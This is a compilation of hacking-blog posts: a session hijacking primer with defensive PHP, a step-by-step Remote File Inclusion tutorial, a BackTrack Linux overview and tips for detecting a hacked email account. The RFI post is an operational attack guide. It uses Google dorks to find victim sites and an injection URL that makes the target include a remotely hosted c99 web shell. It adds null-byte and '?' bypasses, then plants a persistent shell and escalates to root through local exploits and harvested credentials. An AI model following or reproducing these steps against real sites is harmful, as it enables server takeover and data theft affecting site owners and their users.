    Session Hijacking : How to hack online Sessions

Hello friends, I am back, and from now on we will explore more advanced hacking techniques. One of them is session hijacking. In today's tutorial we will discuss how online sessions are hijacked. In today's hacking class I will explain the basics: what session hijacking is, the different types of session hijacking attacks, and the methods used to hijack sessions. In my next tutorial, tomorrow, I will explain in detail how to hijack sessions and what tools you need to take over an active session. So friends, read on…

[Figure: How session hijacking works]


What is Session Hijacking?
Let's discuss it in common terms. As the name suggests, session hijacking means taking over someone's active session and using it to gain unauthorized access to their account, computer or network. So session hijacking is the exploitation of a valid computer or network session. For web applications it is often called HTTP cookie theft or cookie hijacking, because the session is normally identified by a cookie. The older term "magic cookie" simply means an opaque token handed to the client, which the client returns unchanged so that the server can recognize it again.
In web applications the session cookie is the token that authenticates the user to the remote server after login: the browser sends it with every request and the server looks up the logged-in session it belongs to. So in session hijacking what the hacker does is steal (or plant, see session fixation below) the session cookie of an active session, which is why it is called HTTP cookie theft. Nowadays many websites serve the whole site over HTTPS and mark the session cookie Secure, so the browser only ever sends it over TLS. That stops a sniffer on the network from reading it, but it does nothing against cookie theft through cross-site scripting or against session fixation, so HTTPS alone does not end the problem.

Session hijacking is the process of taking over an existing active session. The main reason for hijacking a session is to bypass the authentication process and gain access to the account or machine. Since the session is already active there is no need to re-authenticate, so the hacker can access resources and sensitive information such as stored personal details, bank details and much more without ever knowing the password.

    Different Types of Session Hijacking
Session hijacking involves two types of attacks:
1. Active attack
2. Passive attack

In a passive attack the hacker does not take the session over; he just sits back, watches and records all the traffic sent or received by the victim's computer, for example with a packet sniffer. This is useful for finding sensitive information such as usernames and passwords for websites, Windows logins and much more, and for capturing a session cookie to replay later.

In an active attack the hacker finds an active session and takes it over. At the network (TCP) level this is done by forcing one of the parties offline, usually with a denial-of-service attack (DoS; it need not be distributed), and then continuing the session in its place. At the web level it means presenting the victim's stolen session cookie to the server. Now the hacker controls the active session and executes commands or requests that either give him sensitive information such as passwords or let him keep access, for example by creating a new account or changing the account's e-mail address.
There are also hybrid attacks, where the attacker watches a session for a while and then becomes active by taking it over. Another way is to watch the session and periodically inject data into the active session without actually taking it over.

    Methods to Hijack Sessions
There are four main methods used to perpetrate a session hijack. These are:
• Session fixation, where the attacker sets a user's session id to one known to him, for example by sending the user an e-mail with a link that contains a particular session id (possible when the application accepts a session id from the URL or keeps the same id across login). The attacker now only has to wait until the user logs in with that id.
• Session sidejacking, where the attacker uses packet sniffing to read network traffic between two parties and steal the session cookie. Many websites use SSL/TLS for the login page to stop attackers from seeing the password, but do not use encryption for the rest of the site once the user is authenticated. This lets an attacker who can read the network traffic intercept all the data submitted to the server and every page viewed by the client. Since this data includes the session cookie, he can impersonate the victim even though the password itself is never compromised. Unsecured Wi-Fi hotspots are particularly exposed, as anyone sharing the network can generally read most of the web traffic between other nodes and the access point. Serving the whole site over HTTPS and marking the cookie Secure is the fix.
• Alternatively, an attacker with physical access can simply steal the session key by, for example, reading the cookie file or the memory of the user's browser, or the session store on the server.
• Cross-site scripting (XSS), where the attacker tricks the user's browser into running script that is treated as trustworthy because it appears to come from the server, allowing the attacker to read the cookie through document.cookie and send it to himself, or to perform other operations inside the user's session. Marking the cookie HttpOnly keeps it out of reach of script.
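Putting the four methods together, here is what the defensive side looks like in PHP. This is an added example, not code from the original post: a login handler that issues a fresh session id at login (against fixation), marks the cookie Secure and HttpOnly (against sidejacking and XSS theft) and refuses session ids that did not come from a cookie the server itself issued. The user store and the password "correct horse" are constructed for the demonstration.

```php
<?php
// Added example, not the original post's code: a PHP login that closes the
// four session-hijacking routes listed above.  The user table is constructed
// for the demo; everything else is stock PHP (7.3 or later for the array form
// of session_set_cookie_params / setcookie).
declare(strict_types=1);

// Cookie attributes.  secure   => never sent over plain HTTP (sidejacking)
//                     httponly => invisible to document.cookie (XSS theft)
//                     samesite => not attached to cross-site requests
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'domain'   => '',      // assumption: single host, browser default
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Strict',
]);

// Session ids come only from the cookie, never from ?PHPSESSID= in a link,
// and ids the server did not itself issue are rejected (session fixation).
ini_set('session.use_only_cookies', '1');
ini_set('session.use_trans_sid', '0');
ini_set('session.use_strict_mode', '1');

session_start();

// Constructed user store: username => password hash.  A real site reads this
// from its database; the password "correct horse" exists only for this demo.
function userStore(): array
{
    static $store = null;
    if ($store === null) {
        $store = ['alice' => password_hash('correct horse', PASSWORD_DEFAULT)];
    }
    return $store;
}

function login(string $user, string $pass): bool
{
    $store = userStore();
    if (!isset($store[$user]) || !password_verify($pass, $store[$user])) {
        return false;
    }
    // The fixation fix: a brand-new id at the moment privileges change, with
    // the old session data deleted.  An id planted before login is now dead.
    session_regenerate_id(true);
    $_SESSION['user']       = $user;
    $_SESSION['login_time'] = time();
    return true;
}

function currentUser(): ?string
{
    return $_SESSION['user'] ?? null;
}

function logout(): void
{
    $_SESSION = [];
    // Expire the cookie in the browser as well as destroying it server-side.
    $p = session_get_cookie_params();
    setcookie(session_name(), '', [
        'expires'  => time() - 3600,
        'path'     => $p['path'],
        'domain'   => $p['domain'],
        'secure'   => $p['secure'],
        'httponly' => $p['httponly'],
        'samesite' => $p['samesite'],
    ]);
    session_destroy();
}

// What a POST /login handler would do; the fallbacks let the script run
// from the command line too.
if (login($_POST['user'] ?? 'alice', $_POST['password'] ?? 'correct horse')) {
    echo 'Logged in as ', currentUser(), ' with session ', session_id(), PHP_EOL;
} else {
    echo 'Bad credentials', PHP_EOL;
}
```

Note the ordering: the cookie parameters and the ini settings must be applied before session_start(), and session_regenerate_id(true) must run after the credentials check and before anything is written to $_SESSION, otherwise the pre-login id survives into the authenticated session.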
That's all for today; tomorrow we will discuss in detail how to do session hijacking practically.
I hope you all like this…
If you have any queries, ask me in the comments…
Hello friends, in my previous articles about website hacking I discussed different ways to hack websites and explained website hacking using SQL injection in detail. Today I am going to explain a more advanced method of hacking websites: Remote File Inclusion (RFI). As the name suggests, Remote File Inclusion is a technique in which we make the website's PHP code include a file of our choosing from a remote server (in hacking terminology, a shell), so that the web server executes our code with the web server's own rights. Let's discuss this website hacking technique in detail, so friends, read on…

[Figure: Remote File Inclusion: website hacking method]

    What is Remote File Inclusion?
Remote File Inclusion is a method of hacking websites, and ultimately taking over the server, by getting the site to include a remote file, usually called a SHELL (a web shell is a PHP script that gives you a browser-based file manager and command prompt on the web server). Including it makes the server execute our server-side code as the user the web server runs as (for example www-data or apache), with access to every file that user can read. With these rights we can go on to run local exploits to escalate our privileges and take control of the whole server.
Note: RFI was for years one of the most common ways PHP websites were compromised, and sites running old PHP versions with permissive settings are still exposed to it.


    Which Websites are Vulnerable to Remote File Inclusion attack?
The first and most basic question in the mind of a new hacker is how to find websites that are prone to the remote file inclusion attack, and what the underlying weaknesses are that we target. The answer is quite simple: a PHP script passes something the visitor controls (a query string parameter) into include() or require(), and the PHP configuration lets include() fetch URLs.
Many web servers are vulnerable because of two PHP settings. allow_url_fopen (on by default) lets the file functions open http:// and ftp:// URLs; in PHP before 5.2 it also governed include(), and since 5.2 the separate directive allow_url_include (off by default) does. register_globals (off by default since PHP 4.2, but often switched on by hosting providers) turns every query string parameter into a PHP variable, so a script that includes a file from a variable it expected a config file to set can be pointed at a remote URL simply by naming that variable in the query string.
Note: register_globals was removed entirely in PHP 5.4 (the planned PHP 6.0 never shipped), but the include-a-URL weakness remains whenever allow_url_include is on, so it is worth trying newer PHP sites too. Many websites still run old PHP versions, and a good number of those keep the permissive settings. That means a lot of sites are open to this attack and could be defaced, but as I have said, we are ethical hackers and only find the vulnerabilities in websites.
    Now lets start step by step Remote file inclusion method to hack websites:
    Step 1: Finding the Vulnerable Websites
First of all we have to find a website that loads its pages through the PHP include() function and is vulnerable to RFI (Remote File Inclusion). The best technique is to find websites using Google dorks. Google dorks are simply search queries crafted to return a specific kind of result.

I have already listed a lot of Google dorks in my previous post on hacking websites, so you can look them up there:
How to deface websites using SQL injection.


    Step 2: Identifying Vulnerable website

    Websites that have the page navigation system similar to below mentioned:
    http://target-site.com/index.php?page=PageName

Step 3: Checking Whether the Website is Vulnerable
To check whether the website is vulnerable to remote file inclusion, we try to include a URL instead of PageName, as shown below:
http://target-site.com/index.php?page=http://google.com

If the Google home page is rendered inside the target's page, it is confirmed that the site fetches and includes whatever URL it is given, and we continue the attack. If the Google home page does not appear, we try another website. (This only works when the server's PHP has allow_url_include on, or is older than 5.2 with allow_url_fopen on. A site that appends ".php" to the parameter will request http://google.com.php, which does not resolve, so a URL ending in ? or a %00, as in Steps 4 and 5, may be needed before the test succeeds.)


    Step 4:  Remote Inclusion of Shells
Now we know the website is exploitable, so we include a shell in it. There are a number of shells available online, but my favorites are C99 and r57 because of their extended functionality and features.
There is no need to download these shells to your own PC; we can use copies already hosted online, but if you wish you can download them from their respective websites. I will not provide them here because that would be unethical, but Google them and you can find them easily.
To find a shell, the hacker would search Google for:
inurl:c99.txt
This displays many websites with the shell already hosted and ready to be included. The file must be served as .txt (plain source), not .php, otherwise the hosting server would execute it itself instead of handing us the source to include.
Note: you must append a ? to the URL of the shell, so that anything the target script adds after c99.txt (such as ".php") becomes part of the query string sent to the hosting server instead of changing the file name.

The new URL with the shell included would look like:
http://target-site.com/index.php?page=http://site.com/c99.txt?

Step 5: Adding a Null Byte
Sometimes the PHP script on the server appends ".php" to the end of every included file. So if you included the shell, the path would end up as "c99.txt.php" and not work. To get around this on old servers, add a URL-encoded null byte (%00) to the end of c99.txt: the PHP engine passed the path to C library calls that stop at the first null byte, so everything after c99.txt was ignored. PHP 5.3.4 and later reject paths containing a null byte, so on those servers the ? trick from Step 4 is the one that works.
Step 6: Vulnerability Databases
In Step 1 I said that hackers use Google dorks to look for sites possibly vulnerable to RFI. An example of a Google dork would be:
allinurl:.php?page=
This looks for URLs with .php?page= in them. It is only an example, and you most likely won't find many vulnerable sites with that search alone. Try swapping the word "page" for other parameter names and similar words (file, include, path, dir and so on).

Hackers usually search vulnerability databases such as www.milw0rm.com (now archived at exploit-db.com) for already discovered RFI vulnerabilities in content management systems, then use a Google dork to find websites running that vulnerable web application.

Step 7: If the Attack Succeeds
If we succeed in getting the server to parse the shell, we will see a screen similar to the following:
[Figure: the shell's file listing after a successful RFI attack]

The shell displays information about the remote server and lists the files and directories on it. From here we would find a directory the web server user can write to and upload the shell there, this time as a .php file, so that if the inclusion vulnerability is fixed later we can still reach the shell directly.


Step 8: Getting Root Privileges on the Server
Next we would look for a way to gain root privileges on the system. We can do this by uploading and running local exploits against the server; you can find lists of such exploits on milw0rm (now exploit-db). We could also search the victim server for configuration files: these very often contain usernames and passwords for MySQL databases and the like.

That is the way to hack websites using the remote file inclusion method. I hope you all liked it. I am sure you have a lot of questions regarding this, so don't hesitate to ask in the comments. I will try to answer all your queries.


How to Protect your Websites and Forums from Remote File Inclusion attack?
As we are ethical hackers, I will also explain to webmasters how to protect their websites from RFI.
To protect yourself from RFI attacks, make sure you are using up-to-date scripts and a supported PHP version, and set allow_url_include = Off (and allow_url_fopen = Off if your site does not need it) and register_globals = Off in php.ini. The real fix is in the code: never pass anything from the request straight into include() or require(); map the parameter through a fixed list of allowed pages instead, so that no user-controlled string ever becomes a file path.
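The pattern every step above depends on, beside the fix for webmasters, as an added example that is not the post's own code: the include() dispatcher behind index.php?page=... in its vulnerable form, and a hardened form that maps the parameter through a fixed list so no user-controlled string reaches include(). The page names, file paths and the runtime check on php.ini are assumptions for the demonstration.

```php
<?php
// Added example, not the original post's code: the include() dispatcher
// behind index.php?page=... in its vulnerable and hardened forms.  Page names
// and file paths are assumptions for the demonstration.
declare(strict_types=1);

// ---- Vulnerable form: user input becomes the include path -----------------
// With allow_url_include=On (before PHP 5.2, allow_url_fopen=On was enough)
//   index.php?page=http://site.com/c99.txt?
// fetches and executes the remote file as the web server's user.  The ".php"
// the script appends lands in the query string of that URL, which is why the
// post's Step 4 ends the shell URL with "?".  On PHP older than 5.3.4 a %00
// null byte in the parameter truncated the path instead, which is Step 5.
// Kept here for contrast only; it is never called.
function vulnerableDispatch(string $page): void
{
    include $page . '.php';
}

// ---- Hardened form: map the parameter, never build a path from it --------
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

function safeDispatch(string $page): void
{
    if (!array_key_exists($page, PAGES)) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    // The string reaching include() is ours.  A visitor chooses which of our
    // files runs; he cannot name a new file, local or remote.
    include __DIR__ . '/' . PAGES[$page];
}

// ---- php.ini settings to pair with the code (safe values) ------------------
//   allow_url_include = Off   ; include/require refuse http:// and ftp://
//   allow_url_fopen   = Off   ; if the site can live without remote fopen()
//   register_globals  = Off   ; removed in PHP 5.4; keeps ?var= from setting $var
// Rather than trust the host's configuration, refuse to run if it is unsafe
// (ini_get returns false for a directive that no longer exists, which is fine).
function assertSafeIni(): void
{
    foreach (['allow_url_include', 'register_globals'] as $directive) {
        if (filter_var(ini_get($directive), FILTER_VALIDATE_BOOLEAN)) {
            throw new RuntimeException("$directive must be Off");
        }
    }
}

assertSafeIni();
safeDispatch($_GET['page'] ?? 'home');
```

The allowlist is deliberately an array of fixed strings rather than a check such as "does not start with http://": path-traversal payloads (../../etc/passwd), PHP wrappers (php://input, data://) and encoding tricks all fall outside the three keys, so there is nothing left to bypass.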

    Note: Website hacking is illegal, this article is for Educational purposes only.

    Thanks for reading.. Enjoy and have Happy Hacking..:)
Hi friends, many of my friends and isoftdl users have asked me which operating system is best for hackers and for hacking activities like cracking wireless network passwords, network sniffing, reverse engineering, application hacking, and other encryption and spoofing tools. Today I will share with you which operating system I use for hacking activities. My favorite operating systems are BackTrack Linux and Windows XP, not because they are easier to use but because I love their vast functionality and features. But you can also give Matriux and Knoppix a try; Matriux OS is just awesome, but it is still under construction, as its designers are still working on it and patching it. Now let's discuss the functionality of the BackTrack operating system. I will not discuss Windows XP further because it is so easy to understand that it needs no explanation.


[Figure: BackTrack: best operating system for hackers]


    Best Operating System : Backtrack Linux
BackTrack is a Linux-based penetration testing arsenal that lets security professionals perform assessments in a native environment dedicated to hacking.
Whether you make BackTrack your primary operating system, boot it from a Live DVD, or run it from your favourite thumb drive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.
BackTrack is intended for all audiences, from the most savvy security professionals to newcomers to the information security field. BackTrack offers a quick and easy way to find and update the largest collection of security tools to date.
BackTrack is quite possibly the most comprehensive Linux distribution of security tools. Both hackers and crackers can appreciate the features of this distribution. For black hats it provides easy access to software that facilitates exploitation of secured systems and reverse engineering. For white hats it is a penetration testing platform that finds holes in a security scheme. See, everybody wins!
     
    Major Features of BackTrack Linux
BackTrack features the latest in penetration testing software. The Linux kernel and drivers are patched so that no special driver installation is needed for attacks. For example, an Atheros-based wireless adapter will not enter monitor mode or inject packets without the patched MadWiFi driver. With BackTrack you don't need to worry about that; it is plug-and-play, ready to go.
What's great is that this distribution comes as a live CD, so no installation is needed. However, once you have experienced BackTrack you will realize that it is a must to download this operating system and install it on your laptop. At the very least, download the VMware virtual appliance for BackTrack, and install VMware Tools for Linux as well; most features still work inside VMware.
    • Based on: Debian, Ubuntu
    • Origin: Switzerland
    • Architecture: i386
    • Desktop: Fluxbox, KDE
    • Category: Forensics, Rescue, Live Medium
    • Cost: Free
    Hacking Tools:
    BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for Live CD and Live USB functionality allows users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk is also an option.
    BackTrack includes many well known security tools including:
    • Metasploit integration
    • RFMON Injection capable wireless drivers
    • Kismet
    • Nmap
    • Ettercap
    • Wireshark (formerly known as Ethereal)
    • BeEF (Browser Exploitation Framework)
It also carries a large collection of exploits as well as more commonplace software such as browsers. BackTrack arranges its tools into 11 categories:
    • Information Gathering
    • Network Mapping
    • Vulnerability Identification
    • Web Application Analysis
    • Radio Network Analysis (802.11, Bluetooth, Rfid)
    • Penetration (Exploit & Social Engineering Toolkit)
    • Privilege Escalation
    • Maintaining Access
    • Digital Forensics
    • Reverse Engineering
    • Voice Over IP
and much more; the list is endless.
I hope you liked this post about what to look for in an operating system if you are a hacker or want to be one.
IF YOU HAVE ANY QUERIES, ASK ME…
Thanks for reading.
Hello friends, do you think or suspect that your email account has been hacked, or that somebody else is using your account? Do you suspect that your email account is under attack? Is your email account secure enough that it cannot be hacked? Do you want to make your email account as hack-proof as possible? If yes, then this article is for you. So friends, read on…

    Find Unauthorized Activity in Your Email Account

Sometimes our email account has been hacked and we are not aware of it. Someone else, some hacker, is accessing the account and may be misusing it. Because we are not aware of it, we still think the account and its privacy are safe while a third person is using it and reading our private information. So how do you detect that your account is under attack, that is, how do you find unauthorized activity in your email account? Here are a few tips.
These are some signs of unauthorized activity in your email account:
    1. Your new emails are marked as Read even if you’ve not read them.
    2. Your emails are moved to Trash or even permanently deleted without your notice.
    3. Your emails are being forwarded to a third party email address (check your settings then go to forwarding).
    4. Your secondary email address is changed.
    5. Phone Information is changed.

If you come across any of the above on your email account, it is a strong indication that your email account has been hacked.

There are some additional security features that Gmail provides its users for the security and safety of your account.
Gmail protects your email account through IP address logging: Gmail records the IP address every time someone logs in to your account. So if a third party gets access to your account, his or her IP address is recorded as well. To see the list of recorded IP addresses, scroll down to the bottom of your Gmail inbox and you will see something like this.

Gmail shows the IP address of the last login (last account activity). Click Details to see the IP addresses, access types and times of the most recent sessions. If an IP listed there does not belong to you (your home, office or mobile network), you should suspect unauthorized activity.
Steps to stop unauthorized activity on your email account
1. Verify your mobile phone, so that if your account is somehow hacked it is easier to recover your password.
2. If you suspect that your account is already hacked, these are the recommended things to do:
a.  Change your password.
b.  Change your security question.
c.  Remove any third-party email address (if any) to which your account is set to forward mail.
d.  Make sure that you can still access the email account used as your secondary address.
e.  Also change your secondary email address's password and security question.
This will help you stop all illegal activity in your account. But several people have asked me what to do when their account is already hacked or they have forgotten the password. If your account is already hacked, meaning you can no longer log in, please read the article I wrote a few weeks ago, in which I explained all the possible ways to recover your email account password.
I hope you all like my post. If you like my posts, please comment.
IF YOU HAVE ANY QUERIES, ASK ME!
